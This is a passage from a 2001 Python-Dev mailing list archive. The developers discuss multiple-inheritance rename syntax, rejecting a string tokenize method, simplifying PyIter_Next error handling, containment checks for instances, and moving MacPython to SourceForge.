Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010504141244.A1167@gerg.ca>

On 03 May 2001, Paul F. Dubois said:
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Maybe I'm being thick, but don't you get the same effect by doing this:

class X (Y):
    _sfoo = Y.foo
    _sbar = Y.bar

...or would the "rename" syntax also hide the "foo" and "bar" names from
X's effective namespace[1]?  In that case, I guess some special syntax
is needed.

[1] "effective namespace" -- the union of X's class dict with all its
superclass' dicts; not actually X's namespace, but the set of names you
can use in X.  I think.  Err, whatever.

        Greg


From gward@python.net  Fri May  4 19:15:51 2001
From: gward@python.net (Greg Ward)
Date: Fri, 4 May 2001 14:15:51 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <20010504141551.B1167@gerg.ca>

On 04 May 2001, M.-A. Lemburg said:
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
> 
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
> 
> I like this method -- should I review the code and then check it in ?

I concur with /F: -1 because you can do it easily with re.split().

        Greg
-- 
Greg Ward - Unix bigot                                  gward@python.net
http://starship.python.net/~gward/
I hope something GOOD came in the mail today so I have a REASON to live!!


From guido@digicool.com  Fri May  4 19:36:14 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:36:14 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT."
 <20010504141244.A1167@gerg.ca>
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
 <20010504141244.A1167@gerg.ca>
Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com>

> On 03 May 2001, Paul F. Dubois said:
> > 1. The simple case, X inherits from Y and in defining foo and bar needs to
> > use Y's version:
> > 
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):

[Greg Ward]
> Maybe I'm being thick, but don't you get the same effect by doing this:
> 
> class X (Y):
>     _sfoo = Y.foo
>     _sbar = Y.bar
> 
> ...or would the "rename" syntax also hide the "foo" and "bar" names from
> X's effective namespace[1]?  In that case, I guess some special syntax
> is needed.

Paul's point is that the rename thing makes it possible to deprecate
the form Y.foo, which is causing the basic ambiguity here.

> [1] "effective namespace" -- the union of X's class dict with all its
> superclass' dicts; not actually X's namespace, but the set of names you
> can use in X.  I think.  Err, whatever.

Probably irrelevant.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Fri May  4 19:38:06 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:38:06 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT."
 <20010504141551.B1167@gerg.ca>
References: <3AF27088.DE495210@lemburg.com>
 <20010504141551.B1167@gerg.ca>
Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com>

> On 04 May 2001, M.-A. Lemburg said:
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> > 
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> > 
> > I like this method -- should I review the code and then check it in ?
> 
> I concur with /F: -1 because you can do it easily with re.split().

-1 also.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Fri May  4 19:51:26 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 4 May 2001 14:51:26 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>

[MAL]
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1 here.  Easily enough done via other means, and you just *know* different
people will want different variants of tokenization (e.g., nobody in their
right mind will want " two " coming back from that example, and, given that
it does, that it doesn't also return " three" is baffling).

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

+1 from me:  it's the other half of the existing .encode() method, and the
current lack of symmetry is icky.


From barry@digicool.com  Fri May  4 19:57:09 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Fri, 4 May 2001 14:57:09 -0400
Subject: [Python-Dev] Multiple inheritance
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
 <20010503131714.D21814@inetnebr.com>
Message-ID: <15090.64389.746625.331215@anthem.wooz.org>

>>>>> "JE" == Jeff Epler <jepler@inetnebr.com> writes:

    >> class X (Y rename foo as _sfoo, bar as _sbar ):

    | Why not let us spell this as:
    | 	class X(Y):
    | 		from Y import foo as _sfoo, bar as _sbar
    | 		...

>>>>> "NS" == Neil Schemenauer <nas@python.ca> writes:

    NS> This already has a meaning in Python.  Paul's suggested syntax
    NS> is pretty neat, IMHO.

Not if Y is a class though, right?  That would currently raise an
ImportError, so why not hijack it for this purpose?  I think it has a
natural and clear enough meaning without requiring additional
keywords, or complicating the base class specification syntax.

-Barry


From tim.one@home.com  Fri May  4 21:50:03 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 4 May 2001 16:50:03 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>

In spare moments, I've been plugging away at making various functions work
nice with iterators (map, min, max, etc).

Over and over this requires writing code of the form:

	op2 = PyIter_Next(it);
	if (op2 == NULL) {
		/* StopIteration is *implied* by a NULL return from
		 * PyIter_Next() if PyErr_Occurred() is false.
		 */
		if (PyErr_Occurred()) {
			if (PyErr_ExceptionMatches(PyExc_StopIteration))
				PyErr_Clear();
			else
				goto Fail;
		}
		break;
	}

This is wordy, obscure, and in my experience is needed every time I call
PyIter_Next().

So I'd like to hide this in PyIter_Next instead, like so:

/* Return next item.
 * If an error occurs, return NULL and set *error=1.
 * If the iteration terminated normally, return NULL and set *error=0.
 * Else return the next object and set *error=0.
 */
PyObject *
PyIter_Next(PyObject *iter, int *error)
{
	PyObject *result;
	if (!PyIter_Check(iter)) {
		PyErr_Format(PyExc_TypeError,
			     "'%.100s' object is not an iterator",
			     iter->ob_type->tp_name);
		*error = 1;
		return NULL;
	}
	result = (*iter->ob_type->tp_iternext)(iter);
	*error = 0;
	if (result)
		return result;
	if (PyErr_Occurred()) {
		if (PyErr_ExceptionMatches(PyExc_StopIteration))
			PyErr_Clear();
		else
			*error = 1;
	}
	/* Else StopIteration is implicit, and there is no error. */
	return NULL;
}

Then *calls* could be the simpler:

	op2 = PyIter_Next(it, &error);
	if (op2 == NULL) {
		if {error)
			goto Fail;
		break;
	}

Objections?  So far I'm almost the only user of PyIter_Next(); the only other
use is in ceval's FOR_ITER, which goes thru a similar dance.

However, I'm not clear on why FOR_ITER doesn't clear the exception if
PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
true -- that sure smells like a bug (but, if so, the change above would
squash it by magic).

Note that I'm not proposing to change the signature of the tp_iternext slot
similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.


From guido@digicool.com  Fri May  4 23:03:36 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 17:03:36 -0500
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400."
 <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>
Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>

> In spare moments, I've been plugging away at making various functions work
> nice with iterators (map, min, max, etc).

For which efforts I extend my greatest thanks!

> Over and over this requires writing code of the form:
> 
[etc.]
> 
> This is wordy, obscure, and in my experience is needed every time I call
> PyIter_Next().
> 
> So I'd like to hide this in PyIter_Next instead, like so:
> 
> /* Return next item.
>  * If an error occurs, return NULL and set *error=1.
>  * If the iteration terminated normally, return NULL and set *error=0.
>  * Else return the next object and set *error=0.
>  */
> PyObject *
> PyIter_Next(PyObject *iter, int *error)
> {
[etc.]
> }

> Then *calls* could be the simpler:
> 
> 	op2 = PyIter_Next(it, &error);
> 	if (op2 == NULL) {
> 		if {error)
> 			goto Fail;
> 		break;
> 	}

I originally had this API for tp_iternext, and changed it to the
current API because I got tired of having to declare the error
variable.

How about making PyIter_Next() call PyErr_Clear() when the exception
is StopIteration?

Then calls could be

    op2 = PyIter_Next(it);
    if (op2 == NULL) {
        if (PyErr_Occurred())
            goto Fail;
        break;
    }

This is a tad slower and arguably generates more code (assuming an
extra call is slower than passing an extra argument and loading it)
but doesn't require declaring the error variable.

But since you're the customer, it's your choice.

> Objections?  So far I'm almost the only user of PyIter_Next(); the only other
> use is in ceval's FOR_ITER, which goes thru a similar dance.
> 
> However, I'm not clear on why FOR_ITER doesn't clear the exception if
> PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
> true -- that sure smells like a bug (but, if so, the change above would
> squash it by magic).

Smells like a bug indeed.

> Note that I'm not proposing to change the signature of the tp_iternext slot
> similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Fri May  4 22:18:16 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 4 May 2001 17:18:16 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFMKAAA.tim.one@home.com>

[Tim]
>> In spare moments, I've been plugging away at ... iterators

[Guido]
> For which efforts I extend my greatest thanks!

Yet but a pale reflection of the thanks I extend to you for implementing
these guys to begin with:  they're *loads* of fun!  But not nearly as much
fun as playing with Perl, so they're still prudently Pythonic <wink>.

[T proposed adding a int* error arg to PyIter_Next()]

[G]
> How about making PyIter_Next() call PyErr_Clear() when the exception
> is StopIteration?
>
> Then calls could be
>
>     op2 = PyIter_Next(it);
>     if (op2 == NULL) {
>         if (PyErr_Occurred())
>             goto Fail;
>         break;
>     }

Perfect.  I'll do that later tonight, and update the PEP to match.

> This is a tad slower and arguably generates more code (assuming an
> extra call is slower than passing an extra argument and loading it)
> but doesn't require declaring the error variable.

Well, it's two more calls (since PyErr_Occurred() also makes a call to get
the thread state), but I don't really care because the client only does this
in case of error or end-of-iteration (which aren't the normal cases).  I was
dreading finding a spare int var to pass inside FOR_ITER anyway <wink>.


From paulp@ActiveState.com  Sat May  5 01:03:05 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Fri, 04 May 2001 17:03:05 -0700
Subject: [Python-Dev] ::
Message-ID: <3AF34339.9C553704@ActiveState.com>

I'll throw out a partially formed thought in case it is useful to
anybody.

"::" might be useful to solve another problem I've been struggling with:
how to have multiple package distributions share a namespace
(xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). 

"::" might mean, in general, that you are walking through abstract,
potentially merged namespaces and not through concrete dictionary
implementations. I think that Python's using the same syntax for package
namespaces and attribute accesses might seem more elegant than it is in
practice. Things that "seem like" they should work do not because
packages are fundamentally different than attributes:

>>> from xml import dom.minidom
  File "<stdin>", line 1
    from xml import dom.minidom
                       ^
SyntaxError: invalid syntax

Why isn't this symmetric? I would like to use "." on either side of the
import

>>> import xml
>>> print xml.dom
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'xml' module has no attribute 'dom'
>>> from xml.dom import minidom
>>> print xml.dom
<module 'xml.dom' from 'c:\program
files\python21\lib\xml\dom\__init__.pyc'>

I find it a little bit weird that importing one module has the side
effect of populating a package.
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido@digicool.com  Sat May  5 04:07:56 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 22:07:56 -0500
Subject: [Python-Dev] ::
In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST."
 <3AF34339.9C553704@ActiveState.com>
References: <3AF34339.9C553704@ActiveState.com>
Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com>

> I find it a little bit weird that importing one module has the side
> effect of populating a package.

That's just because you've seen too much Java. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Sat May  5 09:13:30 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 05 May 2001 10:13:30 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
Message-ID: <3AF3B62A.50DD4115@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1 here.  Easily enough done via other means, and you just *know* different
> people will want different variants of tokenization (e.g., nobody in their
> right mind will want " two " coming back from that example, and, given that
> it does, that it doesn't also return " three" is baffling).

Ok. I rejected the patch with a mild response to take on this by
subclassing strings in Python 2.2 ;-)

> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> +1 from me:  it's the other half of the existing .encode() method, and the
> current lack of symmetry is icky.

Right.

If I here no strong objections, I'll check in the .decode()
method next week.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Sat May  5 12:45:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 06:45:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200."
 <3AF0662D.48671B4E@lemburg.com>
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
 <3AF0662D.48671B4E@lemburg.com>
Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com>

> I've attached the patch. Due to a small reorganisation the
> patch is a little longer -- symmetry has its price at C level
> too ;-)

Looks good on paper, so go ahead and check it in.  Watch out for
potential changes caused by Tim's iter-crusade!  :-)

While you're at it, why don't you check in the rot13 codec you posted
-- it's good to have simle examples in the standard library.
It would also be cool to have codecs for common file encodings like
base64, quoted-printable, binhex, uuencode, and even hex
(binascii.hexlify).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sat May  5 13:15:52 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:15:52 -0500
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200."
 <3AF3B62A.50DD4115@lemburg.com>
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
 <3AF3B62A.50DD4115@lemburg.com>
Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com>

> Ok. I rejected the patch with a mild response to take on this by
> subclassing strings in Python 2.2 ;-)

Gustavo didn't take the rejection well.  He contacted me asking for a
better explanation, and we got into a bit of an argument about how
much I must explain my decisions, but I think hge understands now.

> If I here no strong objections, I'll check in the .decode()
> method next week.

Yes, see my previous reply.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sat May  5 13:24:19 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:24:19 -0500
Subject: [Python-Dev] PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST."
 <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net>
References: <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>

In a checkin message, Tim wrote:
> The full story for instance objects is pretty much unexplainable, because
> instance_contains() tries its own flavor of iteration-based containment
> testing first, and PySequence_Contains doesn't get a chance at it unless
> instance_contains() blows up.  A consequence is that
>     some_complex_number in some_instance
> dies with a TypeError unless some_instance.__class__ defines __iter__ but
> does not define __getitem__.

This kind of thing happens everywhere -- instances always define all
slots but using the slots sometimes fails when the corresponding
__foo__ doesn't exist.  Decisions based on the presence or absence of
a slot are therefore in general not reliable; the only exception is
the decision to *call* the slot or not.  The correct solution is not
to catch AttributeError and pretend that the slot didn't exist (which
would mask an AttributeError occurring inside the __contains__ method
if there was one), but to reimplement the default behavior in the
instance slot implementation.

In this case, that means that PySequence_Contains() can be simplified
(no need to test for AttributeError), and instance_contains() should
fall back to a loop over iter(self) rather than trying to use
instance_item().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sat May  5 21:40:11 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 5 May 2001 16:40:11 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>

[Guido]
> This kind of thing happens everywhere -- instances always define all
> slots but using the slots sometimes fails when the corresponding
> __foo__ doesn't exist.  Decisions based on the presence or absence of
> a slot are therefore in general not reliable; the only exception is
> the decision to *call* the slot or not.  The correct solution is not
> to catch AttributeError and pretend that the slot didn't exist (which
> would mask an AttributeError occurring inside the __contains__ method
> if there was one),

Ya, it sucks.  I was inspired by that instance_contains() itself makes
dubious assumptions about what an AttributeError means when the functions
*it* calls raise it <wink>.

> but to reimplement the default behavior in the instance slot
> implementation.

The "backward compatibility" comment in instance_contains() was scary:
compatibility with *what*?  instance_contains() is pretty darn new.  I
assumed it meant there was *some* good (but unidentified) reason we had to
use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
instance_item() "worked".  But I haven't thought of one, except to ensure
that

    some_complex  in  some_instance_with___getitem__

continues to blow up -- but that's not a good reason.  So:

> In this case, that means that PySequence_Contains() can be simplified
> (no need to test for AttributeError), and instance_contains() should
> fall back to a loop over iter(self) rather than trying to use
> instance_item().

Will do!


From guido@digicool.com  Sat May  5 22:48:33 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 16:48:33 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400."
 <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>
Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>

> [Guido]
> > This kind of thing happens everywhere -- instances always define all
> > slots but using the slots sometimes fails when the corresponding
> > __foo__ doesn't exist.  Decisions based on the presence or absence of
> > a slot are therefore in general not reliable; the only exception is
> > the decision to *call* the slot or not.  The correct solution is not
> > to catch AttributeError and pretend that the slot didn't exist (which
> > would mask an AttributeError occurring inside the __contains__ method
> > if there was one),

[Tim]
> Ya, it sucks.  I was inspired by that instance_contains() itself makes
> dubious assumptions about what an AttributeError means when the functions
> *it* calls raise it <wink>.

Actually, instance_contains checks for AttributeError only after
calling instance_getattr(), whose only purpose is to return the
requested attribute or raise AttributeError, so here it is safe: the
__contains__ function hasn't been called yet.

> > but to reimplement the default behavior in the instance slot
> > implementation.
> 
> The "backward compatibility" comment in instance_contains() was scary:
> compatibility with *what*?

With previous behavior of 'x in instance'.  Before we had
__contains__, 'x in y' *always* iterated over the items of y as a
sequence, comparing them to x one at a time.  The loop does that.

> instance_contains() is pretty darn new.  I
> assumed it meant there was *some* good (but unidentified) reason we had to
> use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
> instance_item() "worked".

No, that was probably just an oversight -- clearly it should have used
rich comparisons.  (I guess this is a disadvantage of the approach I'm
recommending here: if the default behavior changes, the
reimplementation of the default behavior in the class must be changed
too.)

> But I haven't thought of one, except to ensure
> that
> 
>     some_complex  in  some_instance_with___getitem__
> 
> continues to blow up -- but that's not a good reason.

Indeed not.

> So:
> 
> > In this case, that means that PySequence_Contains() can be simplified
> > (no need to test for AttributeError), and instance_contains() should
> > fall back to a loop over iter(self) rather than trying to use
> > instance_item().
> 
> Will do!

Thanks!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sat May  5 22:24:58 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 5 May 2001 17:24:58 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>

[Guido]
> Actually, instance_contains checks for AttributeError only after
> calling instance_getattr(), whose only purpose is to return the
> requested attribute or raise AttributeError, so here it is safe: the
> __contains__ function hasn't been called yet.

I'd say "safer", but not "safe":  at that point we only know that *some*
attribute didn't exist, somewhere, while attempting to look up
"__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
hook, like

    def __getattr__(self, attr):
        return global_resolver.resolve(self, attr)

where global_resolver has lost its "resolve" attr.  "except" clauses aren't
more bulletproof in C than in Python <0.9 wink>.

> With previous behavior of 'x in instance'.  Before we had
> __contains__, 'x in y' *always* iterated over the items of y as a
> sequence, comparing them to x one at a time.

I don't believe I ever knew that!  Thanks.  I erronesouly assumed that the
looping behavior was *introduced* when __contains__ was added.

> ...
> No, that was probably just an oversight -- clearly it should have used
> rich comparisons.  (I guess this is a disadvantage of the approach I'm
> recommending here: if the default behavior changes, the
> reimplementation of the default behavior in the class must be changed
> too.)

I factored out the new iterator-based __contains__ logic into a new private
API function, called when appropriate by both PySequence_Contains() and
instance_contains().  So any future changes to what iterator-based
__contains__ means will only need to be made in one place.

too-easy<wink>-ly y'rs  - tim


From guido@digicool.com  Sat May  5 23:31:05 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 17:31:05 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400."
 <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>
Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>

> [Guido]
> > Actually, instance_contains checks for AttributeError only after
> > calling instance_getattr(), whose only purpose is to return the
> > requested attribute or raise AttributeError, so here it is safe: the
> > __contains__ function hasn't been called yet.

[Tim]
> I'd say "safer", but not "safe":  at that point we only know that *some*
> attribute didn't exist, somewhere, while attempting to look up
> "__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
> hook, like
> 
>     def __getattr__(self, attr):
>         return global_resolver.resolve(self, attr)
> 
> where global_resolver has lost its "resolve" attr.  "except" clauses aren't
> more bulletproof in C than in Python <0.9 wink>.

Yes, but attribute errors inside __getattr__ hooks are *always* a
problem to debug, since raising AttributeError is part of its job.  So
this is not new.  I should have said "as safe as it gets."

> > With previous behavior of 'x in instance'.  Before we had
> > __contains__, 'x in y' *always* iterated over the items of y as a
> > sequence, comparing them to x one at a time.
> 
> I don't believe I ever knew that!  Thanks.  I erronesouly assumed that the
> looping behavior was *introduced* when __contains__ was added.

Surely you knew that "x in y" looped over the items of y?  What else
could it have done?  It was only defined on sequences!

> > ...
> > No, that was probably just an oversight -- clearly it should have used
> > rich comparisons.  (I guess this is a disadvantage of the approach I'm
> > recommending here: if the default behavior changes, the
> > reimplementation of the default behavior in the class must be changed
> > too.)
> 
> I factored out the new iterator-based __contains__ logic into a new private
> API function, called when appropriate by both PySequence_Contains() and
> instance_contains().  So any future changes to what iterator-based
> __contains__ means will only need to be made in one place.

Cool.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sat May  5 22:53:51 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 5 May 2001 17:53:51 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHHKAAA.tim.one@home.com>

[Guido]
> ...
> Surely you knew that "x in y" looped over the items of y?  What else
> could it have done?  It was only defined on sequences!

What's a sequence <wink>?  I expect I assumed that enduring a Python method
call for every element of an *instance* was so expensive that Python didn't
bother implementing "in" for instances (just for builtin sequences like lists
and strings etc).  I *know* I assumed it was so expensive that I never tried
it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting
"if x in s" where s was a tuple, list or string of length no more than 4; for
anything bigger I always used a dict or bisect).  So it's a personal blind
spot likely due to never looking in that direction.


From paul@pfdubois.com  Sun May  6 02:10:37 2001
From: paul@pfdubois.com (Paul F. Dubois)
Date: Sat, 5 May 2001 18:10:37 -0700
Subject: [Python-Dev] multiple inheritance -- what I meant
Message-ID: <ADEOIFHFONCLEEPKCACCKEPMCIAA.paul@pfdubois.com>

When I suggested a modification to the inheritance clause,

class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

class X (Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo

I meant two things by my suggestion:

1. I meant that Y.a would never be found when searching for X.a.

In particular, if Z.a exists, and a is not explicity defined in X, X.a is
Z.a.

2. More philosophically, rather than being a consequence of the language
like the second method is, the proposed syntax is intended to be a clear
message to someone reading the class about how the inherited names are being
handled. Compare the effort required of a reader to understand these two.
(If you think the second one is easier, you probably attended Spam III.)

If you can rename in this way there are no problems with multiple
inheritance.

To be complete you should probably also allow

Y undefine x, ...

which simply makes Y.x unavailable from X.


From Greg.Wilson@baltimore.com  Sun May  6 17:26:00 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Sun, 6 May 2001 12:26:00 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>

Has anyone else found themselves wanting a method that
chooses and returns a dictionary element at random, without
removing it (as popitem does)?  Or is there some way to
tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG?

Thanks
Greg


From tim.one@home.com  Sun May  6 19:15:57 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 6 May 2001 14:15:57 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>

[Greg Wilson]
> Has anyone else found themselves wanting a method that
> chooses and returns a dictionary element at random,

Do you mean "random" or "arbitrary"?  "random" means every dict entry is
equally likely to be chosen; "arbitrary" means nothing is defined about the
result (except that it *is* a dict entry).  random is much more expensive to
implement (under the covers it's a vector, but a vector with holes, so you
can't just pick a *slot* at random then "slide over" to the first non-hole
(else a given entry's chance of being selected would be proportional to the #
of contiguous holes adjacent to it)).

> without removing it (as popitem does)?

Note that, in the sense above, popitem() returns an arbitrary element.

> Or is there some way to tell popitem to return a value without
> mutating the container?

No.  Easy to write an efficient function that does, though:

def arb(dict):
    k, v = pair = dict.popitem()
    dict[k] = v  # restore the entry
    return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't
mutate the dict even under the covers:

def arb(dict):
    if dict:
        return dict.iteritems().next()
    raise KeyError("arb passed an empty dict")

> If neither, would this be useful, or is it DHG?

Do you have a particular algorithm, or class of algorithms, in mind for which
it is useful?  popitem's current behavior is most useful for me in the set
algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set


From jack@oratrix.nl  Mon May  7 10:39:43 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:39:43 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl>

Folks,
now that there's finally a decent (well, somewhat decent:-) Mac CVS client 
that supports ssh I'd like to move MacPython to sourceforge. There's two ways 
I can go about this: start a new MacPython project or merge the MacPython 
stuff into the main Python CVS repository.

The Mac specific stuff for Python is all concentrated in a single subtree Mac 
of the main Python tree (the subtree has its own hierarchy of 
Python/Modules/Lib/etc directories), so putting it in the main repository 
should not pollute the filenamespace all that much. It would also have the 
advantage that a single "cvs update" would update everything (whereas the 
current situation for Mac developers, where Python/Mac is from a different 
CVSROOT than Python, does not have that advantage). The downside is that 
everyone who does a full checkout of the tree would get an extra 1000 or so 
files on their disk that are pretty useless unless they have a mac.

Oh yes, another plus for putting stuff in the main repository is MacOSX 
support. Some MacPython modules have been "ported" to MacOSX, and I've started 
on adding them to setup.py, and life would become a lot simpler for people 
compiling on MacOSX if they had everything available automatically.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack@oratrix.nl  Mon May  7 10:45:59 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:45:59 +0200
